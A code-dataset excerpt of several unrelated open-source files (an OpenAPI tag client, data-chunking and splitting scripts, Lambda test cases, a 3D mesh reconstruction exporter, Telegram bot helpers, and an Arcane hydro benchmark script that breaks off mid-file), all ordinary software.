"""修改标签分组 # noqa: E501
修改标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_update(app_token, tag_group_id, v1_tag_groups_update_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
v1_tag_groups_update_request_body (V1TagGroupsUpdateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsUpdateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
kwargs['v1_tag_groups_update_request_body'] = \
v1_tag_groups_update_request_body
return self.v1_tag_groups_update_endpoint.call_with_http_info(**kwargs)
def v1_tags_create(
self,
app_token,
v1_tags_create_request_body,
**kwargs
):
"""创建标签 # noqa: E501
创建标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_create(app_token, v1_tags_create_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tags_create_request_body (V1TagsCreateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsCreateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tags_create_request_body'] = \
v1_tags_create_request_body
return self.v1_tags_create_endpoint.call_with_http_info(**kwargs)
def v1_tags_delete(
self,
app_token,
tagid,
**kwargs
):
"""删除标签 # noqa: E501
删除标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_delete(app_token, tagid, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tagid (str): tagid
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsDeleteResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tagid'] = \
tagid
return self.v1_tags_delete_endpoint.call_with_http_info(**kwargs)
def v1_tags_meta_fetch(
self,
app_token,
v1_tags_meta_fetch_request_body,
**kwargs
):
"""获取标签详情 # noqa: E501
获取标签详情 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_meta_fetch(app_token, v1_tags_meta_fetch_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tags_meta_fetch_request_body (V1TagsMetaFetchRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsMetaFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tags_meta_fetch_request_body'] = \
v1_tags_meta_fetch_request_body
return self.v1_tags_meta_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tags_update(
self,
app_token,
tagid,
v1_tags_update_request_body,
**kwargs
):
"""修改标签 # noqa: E501
修改标签 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tags_update(app_token, tagid, v1_tags_update_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tagid (str): tagid
v1_tags_update_request_body (V1TagsUpdateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagsUpdateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tagid'] = \
tagid
kwargs['v1_tags_update_request_body'] = \
v1_tags_update_request_body
return self.v1_tags_update_endpoint.call_with_http_info(**kwargs)
| 1.40625 | 1 |
aura/aura_breaker.py | FrankWhoee/Aura | 1 | 12765058 | import numpy as np
from aura import aura_loader
import os
import time
import random
def break_aura(path, pieces):
"""
Breaks an aura file into smaller chunks. Saves chunks to local folders.
:param path: A string type of the path to the aura file that is being chunked.
:param pieces: An integer type of how many pieces should result
"""
array = aura_loader.read_file(path)
filepath = "../ChunkedAura" + str(time.time())[5:10]
print("Saving to " + filepath)
os.mkdir(filepath)
l, w, n = array.shape
print(array.shape)
chunkSize = int(n / pieces)
print("Chunking into " + str(chunkSize) + " sized pieces.")
chunk = np.zeros((l, w, chunkSize), dtype=np.float16)
for piece in range(pieces):
print("Chunking piece " + str(piece))
print("Extracting " + str(chunkSize * piece) + " to " + str(chunkSize * piece + chunkSize))
for i in range(chunkSize):
chunk[:, :, i] = array[:, :, i + (chunkSize * piece)]
f = filepath + "/{" + str(l) + "x" + str(w) + "x" + str(chunk.shape[2]) + "}Chunk" + str(piece) + ".aura"
print("Saving chunk " + str(piece) + " to " + f + "\n")
chunk.tofile(f)
print("----------------- CHUNKING COMPLETE -----------------")
def percentise_aura(path, percent):
"""
Breaks an aura file into two pieces of percent sizes.
:param path: A string type of the path to the aura file that is being chunked.
:param percent: A float or double type of the percentage that should be in the first chunk.
Example: percent=0.9 would be 90% of data in first chunk, 10% in the second chunk
"""
array = aura_loader.read_file(path).T
random.shuffle(array)
filepath = "../ChunkedAura" + str(time.time())[5:10]
print("Saving to " + filepath)
os.mkdir(filepath)
n, l, w = array.shape
print(array.shape)
print("Chunking into " + str(percent * 100) + "% and " + str((1 - percent) * 100) + "%")
size1 = int(n * percent)
size2 = int(n * (1 - percent))
print("Chunk1 size = " + str(size1))
print("Chunk2 size = " + str(size2))
chunk1 = np.zeros((l, w, size1), dtype=np.float16)
chunk2 = np.zeros((l, w, size2), dtype=np.float16)
print("Chunking piece 1")
for i in range(size1):
chunk1[:, :, i] = array[i]
f1 = filepath + "/{" + str(chunk1.shape[0]) + "x" + str(chunk1.shape[1]) + "x" + str(
chunk1.shape[2]) + "}Chunk1.aura"
print("Saving chunk1 to " + f1 + "\n")
chunk1.tofile(f1)
for i in range(size2):
chunk2[:, :, i] = array[i + (size1)]
f2 = filepath + "/{" + str(chunk2.shape[0]) + "x" + str(chunk2.shape[1]) + "x" + str(
chunk2.shape[2]) + "}Chunk2.aura"
print("Saving chunk1 to " + f2 + "\n")
chunk2.tofile(f2)
print("----------------- CHUNKING COMPLETE -----------------")
| 3.1875 | 3 |
tests/test_xlibs.py | diatoid/xlambda | 39 | 12765059 | <gh_stars>10-100
'''Test xlibs'''
from typing import Dict
import unittest
from unittest.mock import patch
from xlibs import constants, mutant, utils
from xlibs.response import build
class TestResponse(unittest.TestCase):
'''Test the response routine'''
def test_build_simple(self):
'''Test the build function with a simplified response'''
r = build(
status=200,
)
self.assertIsInstance(r, dict)
# Test response dict keys
self.assertIn('status', r.keys())
self.assertIn('msg', r.keys())
self.assertIn('data', r.keys())
self.assertIn('error', r.keys())
self.assertIn('original_request', r.keys())
# Test response dict values
self.assertEqual(r['status'], 200)
self.assertIsNone(r['msg'])
self.assertIsNone(r['data'])
self.assertIsNone(r['error'])
self.assertIsNone(r['original_request'])
def test_build_full(self):
'''Test a response with all attributes'''
msg = 'There\'s so much more to you than you know, not just pain and anger.' # NOQA
original_request = {
'Waitress': 'Are you drinking to forget?',
'Wolverine': 'No, I\'m drinking to remember.',
}
error = {
'Clothing': 'Should not heal with Wolverine\'s body.',
}
r = build(
status=200,
msg=msg,
data={'professor': '<NAME>'},
error=error,
original_request=original_request,
)
self.assertEqual(r['msg'], msg)
self.assertIsInstance(r['data'], dict)
self.assertIn('professor', r['data'])
self.assertEqual(r['data']['professor'], '<NAME>')
self.assertEqual(r['error'], error)
self.assertEqual(r['original_request'], original_request)
class TestUtils(unittest.TestCase):
'''Test utility functions'''
@patch('xlibs.utils.boto3')
def test_get_object_from_s3(self, boto3):
'''Test function that gets objects from S3 storage'''
utils.get_object_from_s3(
bucket='x-mansion',
object_key='<NAME>',
)
boto3.session.Session.assert_called()
client = boto3.session.Session().client
client.assert_called_with('s3')
s3 = client()
s3.get_object.assert_called()
s3.get_object.assert_called_with(
Bucket='x-mansion',
Key='<NAME>',
)
def test_get_function_name(self):
'''Test script that gets a function name from serverless.yml'''
function_name = utils.get_function_name(function='wolverine')
self.assertEqual(function_name, f'xlambda-wolverine-{constants.STAGE}')
class TestMutants(unittest.TestCase):
'''Test Mutant classes'''
@patch('xlibs.mutant.async_lambda')
def test_execute(self, async_lambda):
'''Test execution of Lambda invocations'''
requests = [
{'function_name': 'test1', 'payload': {'foo': 'bar'}},
{'function_name': 'test2', 'payload': {'foo': 'bar'}},
{'function_name': 'test3', 'payload': {'foo': 'bar'}},
{'function_name': 'test4', 'payload': {'foo': 'bar'}},
{'function_name': 'test5', 'payload': {'foo': 'bar'}},
]
mutant_obj = mutant.Mutant()
mutant_obj.execute(requests=requests)
async_lambda.invoke_all.assert_called()
async_lambda.invoke_all.assert_called_with(
requests=requests,
region=constants.REGION,
)
def test_cyclops_container_count(self):
'''Test counting of how many containers should be warmed up'''
target = {
'name': 'Charles-Xavier',
'region': 'us-east-1',
'settings': {},
'forecast': [4, 15, 2],
'scaling': None,
}
cyclops = mutant.Cyclops()
cyclops.aim(target=target)
cyclops._target.scaling = get_scaling(1, 10, 50)
self.assertEqual(cyclops.containers_to_warm, 10)
cyclops._target.scaling = get_scaling(1, 20, 50)
self.assertEqual(cyclops.containers_to_warm, 15)
cyclops._target.scaling = get_scaling(1, 20, 8)
self.assertEqual(cyclops.containers_to_warm, 8)
def get_scaling(
min_containers: int = 1,
max_containers: int = 10,
max_concurrency: int = 50,
) -> Dict:
return dict(
zip(
['min_containers', 'max_containers', 'max_concurrency'],
[min_containers, max_containers, max_concurrency],
)
)
| 2.75 | 3 |
prep_data/split.py | samiraabnar/DistillingInductiveBias | 10 | 12765060 | <filename>prep_data/split.py<gh_stars>1-10
import sys
import os
import errno
import random
from util.text_util import deps_from_tsv, deps_to_tsv
def make_splits(fname, expr_dir, prop_train=0.1, prop_valid=0.01):
# for reproducibility
random.seed(42)
print('| read in the data')
data = deps_from_tsv(fname)
print('| shuffling')
random.shuffle(data)
n_train = int(len(data) * prop_train)
n_valid = int(len(data) * prop_valid)
train = data[:n_train]
valid = data[n_train: n_train+n_valid]
test = data[n_train+n_valid:]
try:
os.mkdir(expr_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
pass
print('| splitting')
deps_to_tsv(train, os.path.join(expr_dir, 'train.tsv'))
deps_to_tsv(valid, os.path.join(expr_dir, 'valid.tsv'))
deps_to_tsv(test, os.path.join(expr_dir, 'test.tsv'))
print('| done!')
if __name__ == '__main__':
make_splits(sys.argv[1], sys.argv[2]) | 2.203125 | 2 |
export.py | mickare/Robust-Reconstruction-of-Watertight-3D-Models | 6 | 12765061 | <reponame>mickare/Robust-Reconstruction-of-Watertight-3D-Models
"""
Export a html page with each step visualized.
"""
import os
from typing import Optional, Sequence
import numba
import numpy as np
import pytorch3d.structures
import torch
from example import Example, example_config, example_load
from reconstruction import mesh_extraction
from reconstruction.data.chunks import ChunkGrid
from reconstruction.filters.dilate import dilate
from reconstruction.mathlib import Vec3i
from reconstruction.medial_axis_propagating import crust_fix
from reconstruction.mincut import MinCut
from reconstruction.reconstruction import scale_model, crust_dilation, plot_voxels, diffuse, fill_components, \
cleanup_components
from reconstruction.render.cloud_render import CloudRender
from reconstruction.render.voxel_render import VoxelRender
from reconstruction.utils import timed
numba.config.THREADING_LAYER = 'omp'
# Configuration, modify here to change the model
CHUNKSIZE = 16
RESOLUTION_INIT = 64
example = Example.BunnyFixed
STEPS = 3
APPROX_MEDIAL_AXIS = False
if __name__ == '__main__':
# Set initial resolution
resolution = RESOLUTION_INIT
medial_name = "_medial" if APPROX_MEDIAL_AXIS else ""
name = f"{example.name}{medial_name}"
# Export path
path = os.path.join("result", name)
os.makedirs(path, exist_ok=True)
plots = []
print("Loading model")
with timed("\tTime: "):
data = example_load(example)
cfg = example_config[example]
dilations_max = cfg["dilations_max"]
dilations_reverse = cfg["dilations_reverse"]
data_pts, data_offset, data_scale = scale_model(data, resolution=resolution)
model: ChunkGrid[np.bool8] = ChunkGrid(CHUNKSIZE, dtype=np.bool8, fill_value=np.bool8(False))
model[data_pts] = True
model.pad_chunks(2)
model.cleanup()
# Plot only a part of the model points (large models will freeze the browser)
plot_model: Optional[np.ndarray] = data_pts[::5]
crust: ChunkGrid[np.bool8] = model.copy()
crust.cleanup(remove=True)
# Model view
ren = VoxelRender()
fig = ren.make_figure()
fig.add_trace(ren.grid_voxel(crust, opacity=0.1, name='Initial'))
fig.add_trace(CloudRender().make_scatter(plot_model, size=1, name='Model'))
plots.append(os.path.join(path, "model.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
print("Dilation")
with timed("\tTime: "):
crust, components, dilation_step = crust_dilation(crust, max_steps=dilations_max,
reverse_steps=dilations_reverse)
# assert components._fill_value == 2
fig = plot_voxels(components == 0, components, title=f"Initial Dilation")
plots.append(os.path.join(path, f"dilation_start.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
crust_dilate = dilate(crust)
outer_fill = components == 2
crust_outer = outer_fill & crust_dilate
crust_inner = (components == 3) & crust_dilate
assert crust_dilate._fill_value == False
assert outer_fill._fill_value == True
assert crust_outer._fill_value == False
assert crust_inner._fill_value == False
"""
Increase resolution and make the crust_fixmesh approximation finer
"""
for resolution_step in range(0, STEPS):
print(f"RESOLUTION STEP: {resolution_step}")
path_step = os.path.join(path, str(resolution_step))
os.makedirs(path_step, exist_ok=True)
if APPROX_MEDIAL_AXIS:
"""
Approximate Voxel near Medial Axis, by propagating a Normal field inwards.
Then for each voxel compute a normal cone and mark the voxel as inner component when the cone angle is greater than 90°.
"""
print("Crust-Fix")
with timed("\tTime: "):
medial_axis, medial_figs = crust_fix(
crust, outer_fill, crust_outer, crust_inner,
min_distance=dilation_step,
data_pts=plot_model,
return_figs=True
)
crust_inner |= medial_axis
for fig_name, fig in medial_figs.items():
plots.append(os.path.join(path_step, f"{fig_name}.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
# # crust_inner[model] = False # Remove model voxels if they have been added by the crust fix
print("Render Crust")
with timed("\tTime: "):
ren = VoxelRender()
fig = ren.make_figure(title=f"Step-{resolution_step}: Crust")
fig.add_trace(ren.grid_voxel(crust_outer, opacity=0.1, name='Outer'))
fig.add_trace(ren.grid_voxel(crust_inner, opacity=1.0, name='Inner'))
if plot_model is not None:
fig.add_trace(CloudRender().make_scatter(plot_model, size=0.7, name='Model'))
plots.append(os.path.join(path_step, f"crust.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
print("Diffusion")
with timed("\tTime: "):
diff = diffuse(model, repeat=3)
print("Plot-Diffusion")
with timed("\tTime: "):
ren = CloudRender()
fig = ren.make_figure()
# Cut in half
diff_mask = (diff != 1.0) & crust
half = (np.max(data_pts, axis=0) + np.min(data_pts, axis=0)).astype(int) // 2
half_chunk = half // diff_mask.chunk_size
half_chunk_split = half[2] % diff_mask.chunk_size
for index in list(diff_mask.chunks.keys()):
if index[2] > half_chunk[2]:
del diff_mask.chunks[index]
elif index[2] == half_chunk[2]:
ch = diff_mask.chunks.get(index)
arr = ch.to_array()
arr[:, :, half_chunk_split:] = False
ch.set_array(arr)
items = list(diff.items(mask=diff_mask))
items.sort(key=lambda e: e[0][2] * 1024 + e[0][1] + e[0][0])
points, values = zip(*items) # type: Sequence[Vec3i], Sequence
pts = np.array(points, dtype=np.float32) + 0.5
fig.add_trace(ren.make_scatter(
pts,
name="Diffusion",
marker=dict(
size=2.0,
opacity=0.7,
colorscale='Viridis',
color=np.array(values)
),
mode="markers",
))
plots.append(os.path.join(path_step, f"diffusion.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
print("MinCut")
with timed("\tTime: "):
mincut = MinCut(diff, crust, crust_outer, crust_inner)
segment0, segment1 = mincut.grid_segments()
thincrust = segment0 & segment1
print("Render")
with timed("\tTime: "):
ren = VoxelRender()
fig = ren.make_figure(title=f"Step-{resolution_step}: Segments")
fig.add_trace(ren.grid_voxel(segment0, opacity=0.1, name='Segment 0'))
fig.add_trace(ren.grid_voxel(segment1, opacity=0.1, name='Segment 1'))
fig.add_trace(ren.grid_voxel(thincrust, opacity=1.0, name='Join'))
if plot_model is not None:
fig.add_trace(CloudRender().make_scatter(plot_model, size=1, name='Model'))
plots.append(os.path.join(path_step, f"mincut.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
print("Volumetric refinement")
with timed("\tTime: "):
# Rebuild model
resolution *= 2
data_pts, data_offset, data_scale = scale_model(data, resolution=resolution)
model = ChunkGrid(CHUNKSIZE, np.bool8, fill_value=np.bool8(False))
model[data_pts] = np.bool8(True)
plot_model: Optional[np.ndarray] = data_pts[::5]
# Build new crust
crust = dilate(dilate(thincrust.split(2), steps=1) | dilate(model, steps=3))
crust.cleanup(remove=True)
crust.pad_chunks(1)
components, count = fill_components(crust, max_components=5)
cleanup_components(crust, components, count)
outer_fill = (components == 2)
outer_fill.cleanup(remove=True)
crust_dilate = dilate(crust)
crust_outer = outer_fill & crust_dilate
crust_inner = (components == 3) & crust_dilate
crust_outer.cleanup(remove=True)
crust_inner.cleanup(remove=True)
dilation_step = 2
# Validate data
assert crust._fill_value == False
assert outer_fill._fill_value == True
assert crust_outer._fill_value == False
assert crust_inner._fill_value == False
print("Extract mesh")
with timed("\tTime: "):
# Extraction
mesh_extractor = mesh_extraction.MeshExtraction(mincut)
vertices, faces = mesh_extractor.extract_mesh()
ren = VoxelRender()
fig = ren.make_figure()
fig.add_trace(ren.make_mesh(vertices, faces, name='Mesh', flatshading=True))
fig.add_trace(ren.make_wireframe(vertices, faces, name='Wireframe'))
fig.update_layout(showlegend=True)
plots.append(os.path.join(path_step, f"mesh_extraction.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
print("Smoothing mesh")
with timed("\tTime: "):
# Smoothing
pytorch_mesh = pytorch3d.structures.Meshes(verts=[torch.FloatTensor(vertices)],
faces=[torch.LongTensor(faces)])
smoothed_vertices = mesh_extraction.Smoothing().smooth(vertices, faces, diff, pytorch_mesh)
verts = smoothed_vertices.cpu().detach().numpy()
faces = torch.cat(pytorch_mesh.faces_list()).cpu().detach().numpy()
ren = VoxelRender()
fig = ren.make_figure()
fig.add_trace(ren.make_mesh(verts, faces, name='Mesh', flatshading=False))
fig.add_trace(ren.make_wireframe(verts, faces, name='Wireframe'))
fig.update_layout(showlegend=True)
plots.append(os.path.join(path_step, f"mesh_final.html"))
fig.write_html(plots[-1], include_plotlyjs='cdn')
links = ""
for p in plots:
rel_p = p[len(path) + 1:]
links += f"<li><a href=\"{rel_p}\" target=\"page\">{rel_p}</a></li>"
html = f"""<html>
<head>
<title>{name}</title>
<style>
html, body {{
height: 100%;
margin: 0;
}}
#iframe_page {{
width:100%;height:100%;
display: inline-block;
padding:0; margin:0;
}}
/* DivTable.com */
.divTable{{
display: table;
width: 100%; height:100%;
}}
.divTableRow {{
display: table-row;
}}
.divTableHeading {{
background-color: #EEE;
display: table-header-group;
}}
.divTableCell, .divTableHead {{
border: 1px solid #999999;
display: table-cell;
padding: 3px 10px;
}}
.divTableHeading {{
background-color: #EEE;
display: table-header-group;
font-weight: bold;
}}
.divTableFoot {{
background-color: #EEE;
display: table-footer-group;
font-weight: bold;
}}
.divTableBody {{
display: table-row-group;
}}
</style>
</head>
<body>
<div class="divTable">
<div class="divTableBody">
<div class="divTableRow">
<div class="divTableCell" style="vertical-align: top; max-width: 40px;">
<div>
<ul>
<li><a href="..">..</a></li>
</ul>
<ul>
{links}
</ul>
</ul>
</div>
</div>
<div class="divTableCell" style="position:relative;padding:0; margin:0;"><iframe src="model.html" name="page" id="iframe_page"></iframe></div>
</div>
</div>
</div>
</body>
</html>
"""
with open(os.path.join(path, "index.html"), 'wt') as fp:
fp.writelines(html)
| 2.4375 | 2 |
uscensus/tests/errors.py | nkrishnaswami/census | 4 | 12765062 | from ..util.errors import CensusError, DBError
def CensusError_test():
e = CensusError("test")
assert isinstance(e, Exception)
def DBError_test():
e = DBError("test")
assert isinstance(e, CensusError)
assert isinstance(e, Exception)
| 2.828125 | 3 |
commands/general.py | murilo-toddy/telegram-ss | 1 | 12765063 | <gh_stars>1-10
from telegram import Update, ParseMode, ReplyKeyboardRemove, ReplyKeyboardMarkup
from telegram.ext import CallbackContext, CommandHandler
import bot
from config import COMMANDS_SHEET_ID, commands
# Registers execution of certain command
def log_command(cmd: str) -> None:
print(f"\n [!!] Command {cmd} called")
# Default message sending method, using HTML format
def send_message(update: Update, ctx: CallbackContext, text: str) -> None:
ctx.bot.send_message(chat_id=update.effective_chat.id, text=text, parse_mode=ParseMode.HTML)
# Sends message to a specific channel
def send_message_to(ctx: CallbackContext, id: int, text: str) -> None:
ctx.bot.send_message(chat_id=id, text=text, parse_mode=ParseMode.HTML)
# Uses reply method to send message
def reply_text(update: Update, text: str, keyboard: ReplyKeyboardMarkup = ReplyKeyboardRemove()):
update.message.reply_text(text, parse_mode=ParseMode.HTML, reply_markup=keyboard)
# Gets text from commands listed in Bot Commands spreadsheet
def spreadsheet_return_text(update: Update, ctx: CallbackContext) -> None:
cmd = update.message.text[1:]
cmds = [cmds[0] for cmds in commands.sheet("cmd").get_all_values()[1:]]
log_command(cmd)
index = cmds.index(cmd) + 1
send_message(update, ctx, commands.sheet("cmd").get_all_values()[index][1])
# Reload commands listed in Bot Commands spreadsheet
def update_sheet_commands(update: Update, ctx: CallbackContext) -> None:
log_command("refresh")
bot.handler.register_commands(bot.dsp)
send_message(update, ctx, "Comandos atualizados com sucesso!")
# Callback function to reload commands from spreadsheet
def reload_spreadsheet_commands(ctx: CallbackContext):
for cmd in commands.sheet("cmd").get_all_values()[1:]:
bot.dsp.add_handler(CommandHandler(command=cmd[0], callback=spreadsheet_return_text))
print("\n [!] Spreadsheet commands reloaded")
# Create repeating task to reload commands from spreadsheet
def create_auto_refresh():
bot.bot.job_queue.run_repeating(reload_spreadsheet_commands, 900)
# Sends Bot Commands spreadsheet link
def send_sheet(update: Update, ctx: CallbackContext) -> None:
response_text = (
f"<a href='https://docs.google.com/spreadsheets/d/{COMMANDS_SHEET_ID}/edit#gid=0'>Planilha de Comandos</a>"
)
send_message(update, ctx, response_text)
| 2.578125 | 3 |
arcane/extras/benchs/bench_microhydro.py | cedricga91/framework | 16 | 12765064 | #!/usr/bin/env python3
# Note: il faut au moins python 3.5 (pour subprocess.run())
import argparse
import subprocess
from string import Template
from argparse import RawDescriptionHelpFormatter
xstr = """<?xml version="1.0"?>
<case codename="ArcaneTest" xml:lang="en" codeversion="1.0">
<arcane>
<title>Tube a choc de Sod</title>
<timeloop>ArcaneHydroLoop</timeloop>
<modules>
<module name="ArcaneLoadBalance" active="$do_load_balance" />
</modules>
</arcane>
<meshes>
<mesh>
<ghost-layer-builder-version>4</ghost-layer-builder-version>
<generator name="Cartesian3D" >
<nb-part-x>$nb_part_x</nb-part-x>
<nb-part-y>$nb_part_y</nb-part-y>
<nb-part-z>$nb_part_z</nb-part-z>
<origin>1.0 2.0 3.0</origin>
<generate-sod-groups>true</generate-sod-groups>
<x><n>$nb_cell_x</n><length>2.0</length></x>
<y><n>$nb_cell_y</n><length>2.0</length></y>
<z><n>$nb_cell_z</n><length>4.0</length></z>
</generator>
<initialization>
<variable><name>Density</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Density</name><value>0.125</value><group>ZD</group></variable>
<variable><name>Pressure</name><value>1.0</value><group>ZG</group></variable>
<variable><name>Pressure</name><value>0.1</value><group>ZD</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZG</group></variable>
<variable><name>AdiabaticCst</name><value>1.4</value><group>ZD</group></variable>
</initialization>
</mesh>
</meshes>
<arcane-checkpoint>
<do-dump-at-end>false</do-dump-at-end>
</arcane-checkpoint>
<arcane-load-balance>
<active>true</active>
<partitioner name="Metis" />
<period>5</period>
<statistics>true</statistics>
<max-imbalance>0.01</max-imbalance>
<min-cpu-time>0</min-cpu-time>
</arcane-load-balance>
<!-- Configuration du module hydrodynamique -->
<simple-hydro>
<deltat-init>0.00001</deltat-init>
<deltat-min>0.000001</deltat-min>
<deltat-max>0.0001</deltat-max>
<final-time>0.2</final-time>
<viscosity>cell</viscosity>
<viscosity-linear-coef>.5</viscosity-linear-coef>
<viscosity-quadratic-coef>.6</viscosity-quadratic-coef>
<boundary-condition>
<surface>XMIN</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>XMAX</surface><type>Vx</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMIN</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>YMAX</surface><type>Vy</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMIN</surface><type>Vz</type><value>0.</value>
</boundary-condition>
<boundary-condition>
<surface>ZMAX</surface><type>Vz</type><value>0.</value>
</boundary-condition>
</simple-hydro>
</case>
"""
epilog_doc = """
Ce script permet de spécifier et d'exécuter le test MicroHydro en MPI
sur N processeurs, chaque processeur ayant le même nombre de mailles.
Il permet donc des tests d'extensibilité faible (weak scaling).
Ce test doit s'exécuter dans le répertoire où Arcane a été compilé.
L'option '-n|--nb-proc' spécifie le nombre de processus. Si ce nombre
est supérieur à 32, il doit être un multiple de 32.
L'option '-s|--mesh-size' indique le nombre de chunks de mailles pour
chaque PE. La taille d'un chunk est de 2000 mailles. Par defaut le
nombre de chunk est de 10.
Il est possible de spécifier un repartitionnement via l'option
'-l|--loadbalance'. Dans ce cas, le repartitionnement aura lieu toutes
les 5 itérations. Arcane doit avec été compilé avec 'ParMetis' pour
que cela fonctionne.
"""
parser = argparse.ArgumentParser(description="MicroHydro bench",formatter_class=RawDescriptionHelpFormatter,epilog=epilog_doc)
required_arguments = parser.add_argument_group('required named arguments')
required_arguments.add_argument("-n","--nb-proc", dest="nb_proc", action="store", help="number of processus", type=int, required=True)
parser.add_argument("-s","--mesh-size", dest="mesh_size", action="store", help="size of mesh", type=int, default=10)
parser.add_argument("-l","--load-balance", dest="do_load_balance", action="store_true", help="true if load balance is activated")
parser.add_argument("-m","--max-iteration", dest="max_iteration", action="store", help="number of iteration to do", type=int, default=100)
parser.add_argument("-p","--arcane-driver-path", dest="arcane_driver_path", action="store", help="arcane_test_driver path", type=str, default="./bin/arcane_test_driver")
args = parser.parse_args()
nb_proc = args.nb_proc
nb_cell_mult = args.mesh_size
if nb_proc>32:
if nb_proc % 32 != 0:
raise RuntimeError("Bad number of proc (should be a multiple of 32)")
s = Template(xstr)
# Nombre de parties en (X,Y,Z). X*Y*Z doit etre egal au nombre de PE
nb_part_x = 8
nb_part_y = 4
nb_part_z = (nb_proc // 32)
# En dessous de 32 PE, on découpe de manière spécifique
if nb_proc==24:
nb_part_x, nb_part_y, nb_part_z = 4, 3, 2
elif nb_proc==16:
nb_part_x, nb_part_y, nb_part_z = 4, 2, 2
elif nb_proc==12:
nb_part_x, nb_part_y, nb_part_z = 3, 2, 2
elif nb_proc==8:
nb_part_x, nb_part_y, nb_part_z = 2, 2, 2
elif nb_proc==4:
nb_part_x, nb_part_y, nb_part_z = 2, 2, 1
elif nb_part_z==0:
nb_part_x, nb_part_y, nb_part_z = nb_proc, 1, 1
total_nb_part = nb_part_x * nb_part_y * nb_part_z
# Nombre de mailles en (X,Y,Z)
nb_cell_x = 20 * nb_part_x
nb_cell_y = 20 * nb_part_y
nb_cell_z = 5 * nb_part_z * nb_cell_mult
total_nb_cell = nb_cell_x * nb_cell_y * nb_cell_z
do_load_balance = "true" if args.do_load_balance else "false"
d = {
"nb_part_x" : nb_part_x, "nb_part_y" : nb_part_y, "nb_part_z" : nb_part_z,
